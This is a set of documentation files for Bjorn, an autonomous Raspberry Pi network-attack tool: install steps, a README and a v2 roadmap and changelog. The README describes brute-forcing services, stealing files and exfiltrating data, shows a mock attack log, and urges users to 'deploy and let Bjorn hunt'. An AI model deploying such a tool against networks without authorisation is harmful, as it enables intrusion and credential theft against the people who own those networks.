python3-pip \
wget \
lsof \
git \
libopenjp2-7 \
nmap \
libopenblas-dev \
bluez-tools \
bluez \
dhcpcd5 \
bridge-utils \
python3-pil
# Update Nmap scripts database
sudo nmap --script-updatedb
```
#### Step 3: Bjorn Installation
```bash
# Clone the Bjorn repository
cd /home/bjorn
git clone https://github.com/infinition/Bjorn.git
cd Bjorn
# Install Python dependencies (system-wide)
sudo pip install -r requirements.txt --break-system-packages
# I have not yet managed to get a stable installation inside a virtual environment, so the dependencies are installed system-wide (hence --break-system-packages). This has caused no issues so far; feel free to try a virtual environment if you prefer.
```
##### 3.1: Configure E-Paper Display Type
Choose your e-Paper HAT version by modifying the configuration file:
1. Open the configuration file:
```bash
sudo vi /home/bjorn/Bjorn/config/shared_config.json
```
2. Press `i` to enter insert mode.
3. Locate the line containing `"epd_type"` and change the value according to your screen model:
   - For 2.13 V1: `"epd_type": "epd2in13",`
   - For 2.13 V2: `"epd_type": "epd2in13_V2",`
   - For 2.13 V3: `"epd_type": "epd2in13_V3",`
   - For 2.13 V4: `"epd_type": "epd2in13_V4",`
4. Press `Esc` to exit insert mode, then type `:wq` and press Enter to save and quit.
#### Step 4: Configure File Descriptor Limits
To prevent `OSError: [Errno 24] Too many open files`, it's essential to increase the file descriptor limits.
##### 4.1: Modify File Descriptor Limits for All Users
Edit `/etc/security/limits.conf`:
```bash
sudo vi /etc/security/limits.conf
```
Add the following lines:
```
* soft nofile 65535
* hard nofile 65535
root soft nofile 65535
root hard nofile 65535
```
##### 4.2: Configure Systemd Limits
Edit `/etc/systemd/system.conf`:
```bash
sudo vi /etc/systemd/system.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
Edit `/etc/systemd/user.conf`:
```bash
sudo vi /etc/systemd/user.conf
```
Uncomment and modify:
```
DefaultLimitNOFILE=65535
```
##### 4.3: Create or Modify `/etc/security/limits.d/90-nofile.conf`
```bash
sudo vi /etc/security/limits.d/90-nofile.conf
```
Add:
```
root soft nofile 65535
root hard nofile 65535
```
##### 4.4: Adjust the System-wide File Descriptor Limit
Edit `/etc/sysctl.conf`:
```bash
sudo vi /etc/sysctl.conf
```
Add:
```
fs.file-max = 2097152
```
Apply the changes:
```bash
sudo sysctl -p
```
#### Step 5: Reload Systemd and Apply Changes
Reload systemd to apply the new file descriptor limits:
```bash
sudo systemctl daemon-reload
```
#### Step 6: Modify PAM Configuration Files
PAM (Pluggable Authentication Modules) manages how limits are enforced for user sessions. To ensure that the new file descriptor limits are respected, update the following configuration files.
##### Step 6.1: Edit `/etc/pam.d/common-session` and `/etc/pam.d/common-session-noninteractive`
```bash
sudo vi /etc/pam.d/common-session
sudo vi /etc/pam.d/common-session-noninteractive
```
Add this line at the end of both files:
```
session required pam_limits.so
```
This ensures that the limits set in `/etc/security/limits.conf` are enforced for all user sessions.
#### Step 7: Configure Services
##### 7.1: Bjorn Service
Create the service file:
```bash
sudo vi /etc/systemd/system/bjorn.service
```
Add the following content:
```ini
[Unit]
Description=Bjorn Service
DefaultDependencies=no
Before=basic.target
After=local-fs.target
[Service]
ExecStartPre=/home/bjorn/Bjorn/kill_port_8000.sh
ExecStart=/usr/bin/python3 /home/bjorn/Bjorn/Bjorn.py
WorkingDirectory=/home/bjorn/Bjorn
StandardOutput=inherit
StandardError=inherit
Restart=always
User=root
# Check open files and restart if it reached the limit (ulimit -n buffer of 1000)
ExecStartPost=/bin/bash -c 'FILE_LIMIT=$(ulimit -n); THRESHOLD=$(( FILE_LIMIT - 1000 )); while :; do TOTAL_OPEN_FILES=$(lsof | wc -l); if [ "$TOTAL_OPEN_FILES" -ge "$THRESHOLD" ]; then echo "File descriptor threshold reached: $TOTAL_OPEN_FILES (threshold: $THRESHOLD). Restarting service."; systemctl restart bjorn.service; exit 0; fi; sleep 10; done &'
[Install]
WantedBy=multi-user.target
```
##### 7.2: Port 8000 Killer Script
Create the script to free up port 8000:
```bash
vi /home/bjorn/Bjorn/kill_port_8000.sh
```
Add:
```bash
#!/bin/bash
PORT=8000
PIDS=$(lsof -t -i:$PORT)
if [ -n "$PIDS" ]; then
echo "Killing PIDs using port $PORT: $PIDS"
kill -9 $PIDS
fi
```
Make the script executable:
```bash
chmod +x /home/bjorn/Bjorn/kill_port_8000.sh
```
##### 7.3: USB Gadget Configuration
Modify `/boot/firmware/cmdline.txt`:
```bash
sudo vi /boot/firmware/cmdline.txt
```
Add the following right after `rootwait`:
```
modules-load=dwc2,g_ether
```
Modify `/boot/firmware/config.txt`:
```bash
sudo vi /boot/firmware/config.txt
```
Add at the end of the file:
```
dtoverlay=dwc2
```
Create the USB gadget script:
```bash
sudo vi /usr/local/bin/usb-gadget.sh
```
Add the following content:
```bash
#!/bin/bash
set -e
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: ECM network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/ecm.usb0
# Check for existing symlink and remove if necessary
if [ -L configs/c.1/ecm.usb0 ]; then
rm configs/c.1/ecm.usb0
fi
ln -s functions/ecm.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
else
echo "Interface usb0 already configured."
fi
```
Make the script executable:
```bash
sudo chmod +x /usr/local/bin/usb-gadget.sh
```
Create the systemd service:
```bash
sudo vi /etc/systemd/system/usb-gadget.service
```
Add:
```ini
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
```
Configure `usb0`:
```bash
sudo vi /etc/network/interfaces
```
Add:
```bash
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
```
Reload the services:
```bash
sudo systemctl daemon-reload
sudo systemctl enable systemd-networkd
sudo systemctl enable usb-gadget
sudo systemctl start systemd-networkd
sudo systemctl start usb-gadget
```
You must reboot before the device can be used as a USB gadget (with the IP configured above).
###### Windows PC Configuration
Set the static IP address on your Windows PC:
- **IP Address**: `172.20.2.2`
- **Subnet Mask**: `255.255.255.0`
- **Default Gateway**: `172.20.2.1`
- **DNS Servers**: `8.8.8.8`, `8.8.4.4`
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

MIT License
Copyright (c) 2024 infinition
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

# <img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="33"> Bjorn
![Python](https://img.shields.io/badge/Python-3776AB?logo=python&logoColor=fff)
![Status](https://img.shields.io/badge/Status-Development-blue.svg)
[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Reddit](https://img.shields.io/badge/Reddit-Bjorn__CyberViking-orange?style=for-the-badge&logo=reddit)](https://www.reddit.com/r/Bjorn_CyberViking)
[![Discord](https://img.shields.io/badge/Discord-Join%20Us-7289DA?style=for-the-badge&logo=discord)](https://discord.com/invite/B3ZH9taVfT)
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="150">
<img src="https://github.com/user-attachments/assets/1b490f07-f28e-4418-8d41-14f1492890c6" alt="bjorn_epd-removebg-preview" width="150">
</p>
Bjorn is a sophisticated, autonomous, "Tamagotchi-like" network scanning, vulnerability assessment, and offensive security tool designed to run on a Raspberry Pi equipped with a 2.13-inch e-Paper HAT. This document provides a detailed explanation of the project.
## 📚 Table of Contents
- [Introduction](#-introduction)
- [Features](#-features)
- [Getting Started](#-getting-started)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Quick Start](#-quick-start)
- [Usage Example](#-usage-example)
- [Contributing](#-contributing)
- [License](#-license)
- [Contact](#-contact)
## 📄 Introduction
Bjorn is a powerful tool designed to perform comprehensive network scanning, vulnerability assessment, and data exfiltration. Its modular design and extensive configuration options allow for flexible and targeted operations. By combining different actions and orchestrating them intelligently, Bjorn can provide valuable insights into network security and help identify and mitigate potential risks.
The e-Paper HAT display and web interface make it easy to monitor and interact with Bjorn, providing real-time updates and status information. With its extensible architecture and customizable actions, Bjorn can be adapted to suit a wide range of security testing and monitoring needs.
## 🌟 Features
- **Network Scanning**: Identifies live hosts and open ports on the network.
- **Vulnerability Assessment**: Performs vulnerability scans using Nmap and other tools.
- **System Attacks**: Conducts brute-force attacks on various services (FTP, SSH, SMB, RDP, Telnet, SQL).
- **File Stealing**: Extracts data from vulnerable services.
- **User Interface**: Real-time display on the e-Paper HAT and web interface for monitoring and interaction.
![Bjorn Display](https://github.com/infinition/Bjorn/assets/37984399/bcad830d-77d6-4f3e-833d-473eadd33921)
## 🚀 Getting Started
## 📌 Prerequisites
### 📋 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📋 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
Bjorn was not developed for the 64-bit Raspberry Pi Zero 2 W, but several users have reported that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the V2 and V4 e-Paper screens have been tested and implemented.
I hope the V1 and V3 will work the same.
### 🔨 Installation
The fastest way to install Bjorn is using the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh && sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
For **detailed information** about the **installation** process, see the [Install Guide](INSTALL.md).
## ⚡ Quick Start
**Need help? Struggling to find Bjorn's IP after the installation?**
Use my Bjorn Detector & SSH Launcher:
[https://github.com/infinition/bjorn-detector](https://github.com/infinition/bjorn-detector)
![ezgif-1-a310f5fe8f](https://github.com/user-attachments/assets/182f82f0-5c3a-48a9-a75e-37b9cfa2263a)
**Hmm, still need help?**
For **detailed information** about **troubleshooting**, see [Troubleshooting](TROUBLESHOOTING.md).
**Quick Installation**: for the fastest way to install **Bjorn**, see [Getting Started](#-getting-started).
## 💡 Usage Example
Here's a demonstration of how Bjorn autonomously hunts through your network like a Viking raider (fake demo for illustration):
```bash
# Reconnaissance Phase
[NetworkScanner] Discovering alive hosts...
[+] Host found: 192.168.1.100
├── Ports: 22,80,445,3306
└── MAC: 00:11:22:33:44:55
# Attack Sequence
[NmapVulnScanner] Found vulnerabilities on 192.168.1.100
├── MySQL 5.5 < 5.7 - User Enumeration
└── SMB - EternalBlue Candidate
[SSHBruteforce] Cracking credentials...
[+] Success! user:password123
[StealFilesSSH] Extracting sensitive data...
# Automated Data Exfiltration
[SQLBruteforce] Database accessed!
[StealDataSQL] Dumping tables...
[SMBBruteforce] Share accessible
[+] Found config files, credentials, backups...
```
This is just a demo output - actual results will vary based on your network and target configuration.
All discovered data is automatically organized in the data/output/ directory, viewable through both the e-Paper display (as indicators) and web interface.
Bjorn works tirelessly, expanding its network knowledge base and growing stronger with each discovery.
No constant monitoring needed - just deploy and let Bjorn do what it does best: hunt for vulnerabilities.
🔧 Expand Bjorn's Arsenal!
Bjorn is designed to be a community-driven weapon forge. Create and share your own attack modules!
⚠️ **For educational and authorized testing purposes only** ⚠️
## 🤝 Contributing
The project welcomes contributions in:
- New attack modules.
- Bug fixes.
- Documentation.
- Feature improvements.
For **detailed information** about the **contribution** process, see the [Contributing Docs](CONTRIBUTING.md), [Code Of Conduct](CODE_OF_CONDUCT.md) and [Development Guide](DEVELOPMENT.md).
## 📫 Contact
- **Report Issues**: Via GitHub.
- **Guidelines**:
- Follow ethical guidelines.
- Document reproduction steps.
- Provide logs and context.
- **Author**: __infinition__
- **GitHub**: [infinition/Bjorn](https://github.com/infinition/Bjorn)
## 🌠 Stargazers
[![Star History Chart](https://api.star-history.com/svg?repos=infinition/bjorn&type=Date)](https://star-history.com/#infinition/bjorn&Date)
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# BJORN Cyberviking — Roadmap & Changelog
> Comprehensive audit-driven roadmap for the v2 release.
> Each section tracks scope, status, and implementation notes.
---
## Legend
| Tag | Meaning |
|-----|---------|
| `[DONE]` | Implemented and verified |
| `[WIP]` | Work in progress |
| `[TODO]` | Not yet started |
| `[DROPPED]` | Descoped / won't fix |
---
## P0 — Security & Blockers (Must-fix before release)
### SEC-01: Shell injection in system_utils.py `[DONE]`
- **File:** `web_utils/system_utils.py`
- **Issue:** `subprocess.Popen(command, shell=True)` on reboot, shutdown, restart, clear_logs
- **Fix:** Replace all `shell=True` calls with argument lists (`["sudo", "reboot"]`)
- **Risk:** Command injection if any parameter is ever user-controlled
### SEC-02: Path traversal in DELETE route `[DONE]`
- **File:** `webapp.py:497-498`
- **Issue:** MAC address extracted from URL path with no validation — `self.path.split(...)[-1]`
- **Fix:** URL-decode and validate MAC format with regex before passing to handler
### SEC-03: Path traversal in file operations `[DONE]`
- **File:** `web_utils/file_utils.py`
- **Issue:** `move_file`, `rename_file`, `delete_file` accept paths from POST body.
Path validation uses `startswith()` which can be bypassed (symlinks, encoding).
- **Fix:** Use `os.path.realpath()` instead of `os.path.abspath()` for canonicalization.
Add explicit path validation helper used by all file ops.
### SEC-04: Cortex secrets committed to repo `[DONE]`
- **Files:** `bjorn-cortex/Cortex/security_config.json`, `server_config.json`
- **Issue:** JWT secret, TOTP secret, admin password hash, device API key in git
- **Fix:** Replaced with clearly-marked placeholder values + WARNING field, already in `.gitignore`
### SEC-05: Cortex WebSocket without auth `[DONE]`
- **File:** `bjorn-cortex/Cortex/server.py`
- **Issue:** `/ws/logs` endpoint has no authentication — anyone can see training logs
- **Fix:** Added `_verify_ws_token()` — JWT via query param or first message, close 4401 on failure
### SEC-06: Cortex device API auth disabled by default `[DONE]`
- **File:** `bjorn-cortex/Cortex/server_config.json`
- **Issue:** `allow_device_api_without_auth: true` + empty `device_api_key`
- **Fix:** Default to `false`, placeholder API key, CORS origins via `CORS_ORIGINS` env var
---
## P0 — Bluetooth Fixes
### BT-01: Bare except clauses `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:225,258`
- **Issue:** `except:` swallows all exceptions including SystemExit, KeyboardInterrupt
- **Fix:** Replace with `except (dbus.exceptions.DBusException, Exception) as e:` with logging
### BT-02: Null address passed to BT functions `[DONE]`
- **File:** `webapp.py:210-214`
- **Issue:** `d.get('address')` can return None, passed directly to BT methods
- **Fix:** Add null check + early return with error in each lambda/BT method entry point
### BT-03: Race condition on bt.json `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:200-216`
- **Issue:** Read-modify-write on shared file without locking
- **Fix:** Add `threading.Lock` for bt.json access, use atomic write pattern
### BT-04: auto_bt_connect service crash `[DONE]`
- **File:** `web_utils/bluetooth_utils.py:219`
- **Issue:** `subprocess.run(..., check=True)` raises CalledProcessError if service missing
- **Fix:** Use `check=False` and log warning instead of crashing
---
## P0 — Web Server Fixes
### WEB-01: SSE reconnect counter reset bug `[DONE]`
- **File:** `web/js/core/console-sse.js:367`
- **Issue:** `reconnectCount = 0` on every message — a single flaky message resets counter,
enabling infinite reconnect loops
- **Fix:** Only reset counter after sustained healthy connection (e.g., 5+ messages)
### WEB-02: Silent routes list has trailing empty string `[DONE]`
- **File:** `webapp.py:474`
- **Issue:** Empty string `""` in `silent_routes` matches ALL log messages
- **Fix:** Remove empty string from list
---
## P1 — Stability & Consistency
### STAB-01: Uniform error handling pattern `[DONE]`
- **Files:** All `web_utils/*.py`
- **Issue:** Mix of bare `except:`, `except Exception`, inconsistent error response format
- **Fix:** Establish `_json_response(handler, data, status)` helper; catch specific exceptions
### STAB-02: Add pagination to heavy API endpoints `[DONE]`
- **Files:** `web_utils/netkb_utils.py`, `web_utils/orchestrator_utils.py`
- **Endpoints:** `/netkb_data`, `/list_credentials`, `/network_data`
- **Fix:** Accept `?page=N&per_page=M` query params, return `{data, total, page, pages}`
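The response shape can be produced with a small helper along these lines (a sketch, not the actual implementation):

```python
def paginate(items, page=1, per_page=50):
    """Slice a full result list into the {data, total, page, pages} shape."""
    total = len(items)
    pages = max(1, -(-total // per_page))  # ceiling division, at least one page
    start = (page - 1) * per_page
    return {
        "data": items[start:start + per_page],
        "total": total,
        "page": page,
        "pages": pages,
    }
```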
### STAB-03: Dead routes & unmounted pages `[DONE]`
- **Files:** `web/js/app.js`, various
- **Issue:** GPS UI elements with no backend, rl-dashboard not mounted, zombieland incomplete
- **Fix:** Remove GPS placeholder, wire rl-dashboard mount, mark zombieland as beta
### STAB-04: Missing constants for magic numbers `[DONE]`
- **Files:** `web_utils/bluetooth_utils.py`, `webapp.py`
- **Fix:** Extract timeout values, pool sizes, size limits to named constants
---
## P2 — Web SPA Quality
### SPA-01: Review & fix dashboard.js `[DONE]`
- Check stat polling, null safety, error display
### SPA-02: Review & fix network.js `[DONE]`
- D3 graph cleanup on unmount, memory leak check
### SPA-03: Review & fix credentials.js `[DONE]`
- Search/filter robustness, export edge cases
### SPA-04: Review & fix vulnerabilities.js `[DONE]`
- CVE modal error handling, feed sync status
### SPA-05: Review & fix files.js `[DONE]`
- Upload progress, drag-drop edge cases, path validation
### SPA-06: Review & fix netkb.js `[DONE]`
- View mode transitions, filter persistence, pagination integration
### SPA-07: Review & fix web-enum.js `[DONE]`
- Status code filter, date range, export completeness
### SPA-08: Review & fix rl-dashboard.js `[DONE]`
- Canvas cleanup, mount lifecycle, null data handling
### SPA-09: Review & fix zombieland.js (C2) `[DONE]`
- SSE lifecycle, agent list refresh, mark as experimental
### SPA-10: Review & fix scripts.js `[DONE]`
- Output polling cleanup, project upload validation
### SPA-11: Review & fix attacks.js `[DONE]`
- Tab switching, image upload validation
### SPA-12: Review & fix bjorn.js (EPD viewer) `[DONE]`
- Image refresh, zoom controls, null EPD state
### SPA-13: Review & fix settings-config.js `[DONE]`
- Form generation edge cases, chip editor validation
### SPA-14: Review & fix actions-studio.js `[DONE]`
- Canvas lifecycle, node dragging, edge persistence
---
## P2 — AI/Cortex Improvements
### AI-01: Feature selection / importance analysis `[DONE]`
- Variance-based feature filtering in data consolidator (drops near-zero variance features)
- Feature manifest exported alongside training data
- `get_feature_importance()` method on FeatureLogger for introspection
- Config: `ai_feature_selection_min_variance` (default 0.001)
### AI-02: Continuous reward shaping `[DONE]`
- Extended reward function with 4 new components: novelty bonus, repeat penalty,
diminishing returns, partial credit for long-running failed actions
- Helper methods to query attempt counts and consecutive failures from ml_features
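A toy illustration of how such shaping components can combine (the weights and formulas below are invented for illustration, not the actual Cortex values):

```python
def shaped_reward(base, attempts=0, consecutive_failures=0,
                  is_novel=False, duration_s=0.0):
    """Combine a base reward with the four shaping components listed above."""
    reward = base
    if is_novel:
        reward += 0.5                        # novelty bonus (assumed weight)
    reward -= 0.1 * consecutive_failures     # repeat penalty (assumed weight)
    reward /= (1 + 0.2 * attempts)           # diminishing returns on re-runs
    if base <= 0 and duration_s > 60:
        reward += 0.05                       # partial credit for long-running failures
    return reward
```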
### AI-03: Model versioning & rollback `[DONE]`
- Keep up to 3 model versions on disk (configurable)
- Model history tracking: version, loaded_at, accuracy, avg_reward
- `rollback_model()` method to load previous version
- Auto-rollback if average reward drops below previous model after 50 decisions
### AI-04: Low-data cold-start bootstrap `[DONE]`
- Bootstrap scores dict accumulating per (action_name, port_profile) running averages
- Blended heuristic/bootstrap scoring (40-80% weight based on sample count)
- Persistent `ai_bootstrap_scores.json` across restarts
- Config: `ai_cold_start_bootstrap_weight` (default 0.6)
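The blending described above can be sketched as follows (the linear ramp from 40% to 80% bootstrap weight is an illustrative assumption):

```python
def blended_score(heuristic, bootstrap_avg, samples,
                  min_weight=0.4, max_weight=0.8):
    """Blend a static heuristic score with the learned bootstrap average.

    The bootstrap weight ramps from min_weight toward max_weight as more
    samples accumulate, so early decisions lean on the heuristic and later
    ones on accumulated experience.
    """
    w = min(max_weight, min_weight + 0.04 * samples)
    return (1 - w) * heuristic + w * bootstrap_avg
```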
---
## P3 — Future Features
### EPD-01: Multi-size EPD layout engine `[DONE]`
- New `display_layout.py` module with `DisplayLayout` class
- JSON layout definitions per EPD type (2.13", 2.7")
- Element-based positioning: each UI component has named anchor `{x, y, w, h}`
- Custom layouts stored in `resources/layouts/{epd_type}.json`
- `px()`/`py()` scaling preserved, layout provides reference coordinates
- Integrated into `display.py` rendering pipeline
### EPD-02: Web-based EPD layout editor `[DONE]`
- Backend API: `GET/POST /api/epd/layout`, `POST /api/epd/layout/reset`
- `GET /api/epd/layouts` lists all supported EPD types and their layouts
- `GET /api/epd/layout?epd_type=X` to fetch layout for a specific EPD type
- Frontend editor: `web/js/core/epd-editor.js` — 4th tab in attacks page
- SVG canvas with drag-and-drop element positioning and corner resize handles
- Display mode preview: Color, NB (black-on-white), BN (white-on-black)
- Grid/snap, zoom (50-600%), toggleable element labels
- Add/delete elements, import/export layout JSON
- Properties panel with x/y/w/h editors, font size editors
- Undo system (50-deep snapshot stack, Ctrl+Z)
- Color-coded elements by type (icons=blue, text=green, bars=orange, etc.)
- Transparency-aware checkerboard canvas background
- Arrow key nudge, keyboard shortcuts
### ORCH-01: Per-action circuit breaker `[DONE]`
- New `action_circuit_breaker` DB table: failure_streak, circuit_status, cooldown_until
- Three states: closed → open (after N fails) → half_open (after cooldown)
- Exponential backoff: `min(2^streak * 60, 3600)` seconds
- Integrated into `_should_queue_action()` check
- Success on half-open resets circuit, failure re-opens with longer cooldown
- Config: `circuit_breaker_threshold` (default 3)
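The documented backoff formula is straightforward to express (the function name here is illustrative):

```python
def circuit_cooldown(failure_streak, base_s=60, cap_s=3600):
    """Exponential backoff for an open circuit: min(2^streak * 60, 3600) seconds."""
    return min((2 ** failure_streak) * base_s, cap_s)
```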
### ORCH-02: Global concurrency limiter `[DONE]`
- DB-backed running action count check before scheduling
- `count_running_actions()` method in queue.py
- Per-action `max_concurrent` support in requirements evaluator
- Respects `semaphore_slots` config (default 5)
### ORCH-03: Manual mode with active scanning `[DONE]`
- Background scan timer thread in MANUAL mode
- NetworkScanner runs at `manual_mode_scan_interval` (default 180s)
- Config: `manual_mode_auto_scan` (default True)
- Scan timer auto-stops when switching back to AUTO/AI
---
## Changelog
### 2026-03-12 — Security & Stability Audit
#### Security
- **[SEC-01]** Replaced all `shell=True` subprocess calls with safe argument lists
- **[SEC-02]** Added MAC address validation (regex) in DELETE route handler
- **[SEC-03]** Strengthened path validation using `os.path.realpath()` + dedicated helper
- **[BT-01]** Replaced bare `except:` with specific exception handling + logging
- **[BT-02]** Added null address validation in Bluetooth route lambdas and method entry points
- **[BT-03]** Added file lock for bt.json read/write operations
- **[BT-04]** Changed auto_bt_connect restart to non-fatal (check=False)
- **[SEC-04]** Cortex config files: placeholder secrets + WARNING field, already gitignored
- **[SEC-05]** Added JWT auth to Cortex WebSocket `/ws/logs` endpoint
- **[SEC-06]** Cortex device API auth now required by default, CORS configurable via env var
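Two of the fixes above follow well-known patterns; the sketch below is illustrative (the exact regex and command line used in the codebase may differ):

```python
import re
import subprocess

# SEC-02 pattern: validate a MAC before it reaches any query or command.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")

def is_valid_mac(mac) -> bool:
    return bool(MAC_RE.fullmatch(mac or ""))

def ping_host(ip: str) -> int:
    # SEC-01 pattern: an argument list instead of shell=True, so `ip` is
    # passed as a single argv entry and cannot inject shell syntax.
    return subprocess.run(["ping", "-c", "1", ip], check=False).returncode
```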
#### Bug Fixes
- **[WEB-01]** Fixed SSE reconnect counter: only resets after 5+ consecutive healthy messages
- **[WEB-02]** Removed empty string from silent_routes that was suppressing all log messages
- **[STAB-03]** Cleaned up dead GPS UI references, wired rl-dashboard mount
- **[ORCH-BUG]** Fixed Auto→Manual mode switch not resetting status to IDLE (4-location fix):
- `orchestrator.py`: Reset all status fields after main loop exit AND after action completes with exit flag
- `Bjorn.py`: Reset status even when `thread.join(10)` times out
- `orchestrator_utils.py`: Explicit IDLE reset in web API stop handler
#### Quality
- **[STAB-01]** Standardized error handling across web_utils modules
- **[STAB-04]** Extracted magic numbers to named constants
#### SPA Page Review (SPA-01..14)
All 18 SPA page modules reviewed and fixed:
**Pages fully rewritten (11 pages):**
- **dashboard.js** — New layout with ResourceTracker, safe DOM (no innerHTML), visibility-aware pollers, proper uptime ticker cleanup
- **network.js** — D3 force graph cleanup on unmount, lazy d3 loading, search debounce tracked, simulation stop
- **credentials.js** — AbortController tracked, toast timer tracked, proper state reset in unmount
- **vulnerabilities.js** — ResourceTracker integration, abort controllers, null safety throughout
- **files.js** — Upload progress, drag-drop safety, ResourceTracker lifecycle
- **netkb.js** — View mode persistence, filter tracked, pagination integration
- **web-enum.js** — Status filter, date range, tracked pollers and timeouts
- **rl-dashboard.js** — Canvas cleanup, chart lifecycle, null data guards
- **zombieland.js** — SSE lifecycle tracked, agent list cleanup, experimental flag
- **attacks.js** — Tab switching, ResourceTracker integration, proper cleanup
- **bjorn.js** — Image refresh tracked, zoom controls, null EPD state handling
**Pages with targeted fixes (7 pages):**
- **bjorn-debug.js** — Fixed 3 button event listeners using raw `addEventListener` → `tracker.trackEventListener` (memory leak)
- **scheduler.js** — Added `searchDeb` timeout cleanup + state reset in unmount (zombie timer)
- **actions.js** — Added resize debounce cleanup in unmount + tracked `highlightPane` timeout (zombie timer)
- **backup.js** — Already clean: ResourceTracker, sidebar layout cleanup, state reset (no changes needed)
- **database.js** — Already clean: search debounce cleanup, sidebar layout, Poller lifecycle (no changes needed)
- **loot.js** — Already clean: search timer cleanup, ResourceTracker, state reset (no changes needed)
- **actions-studio.js** — Already clean: runtime cleanup function, ResourceTracker (no changes needed)
#### AI Pipeline (AI-01..04)
- **[AI-01]** Feature selection: variance-based filtering in `data_consolidator.py`, feature manifest export, `get_feature_importance()` in `feature_logger.py`
- **[AI-02]** Continuous reward shaping in `orchestrator.py`: novelty bonus, diminishing returns penalty, partial credit for long-running failures, attempt/streak DB queries
- **[AI-03]** Model versioning in `ai_engine.py`: 3-model history, `rollback_model()`, auto-rollback after 50 decisions if avg reward drops
- **[AI-04]** Cold-start bootstrap in `ai_engine.py`: persistent `ai_bootstrap_scores.json`, blended heuristic/bootstrap scoring with adaptive weighting
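The blended scoring in [AI-04] can be pictured as a weighted mix whose bootstrap weight fades as real experience accumulates. The linear decay schedule below is an assumption for illustration; only the 0.6 default (`ai_cold_start_bootstrap_weight`) comes from the source.

```python
def blended_score(heuristic, bootstrap, decisions_seen,
                  base_weight=0.6, decay_after=50):
    """Mix static heuristic and bootstrap scores during cold start.

    `base_weight` mirrors ai_cold_start_bootstrap_weight; the bootstrap
    influence fades linearly to zero after `decay_after` decisions.
    """
    fade = max(0.0, 1.0 - decisions_seen / decay_after)
    w = base_weight * fade
    return w * bootstrap + (1.0 - w) * heuristic
```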
#### Orchestrator (ORCH-01..03)
- **[ORCH-01]** Circuit breaker: new `action_circuit_breaker` DB table in `db_utils/queue.py`, 3-state machine (closed→open→half-open), exponential backoff `min(2^N*60, 3600)s`, integrated into `action_scheduler.py` scheduling decisions and `orchestrator.py` post-execution
- **[ORCH-02]** Global concurrency limiter: `count_running_actions()` in `db_utils/queue.py`, pre-schedule check in `action_scheduler.py` against `semaphore_slots` config
- **[ORCH-03]** Manual mode scanning: background `_scan_loop` thread in `orchestrator_utils.py`, runs at `manual_mode_scan_interval` (180s default), auto-stops on mode switch
#### EPD Multi-Size (EPD-01..02)
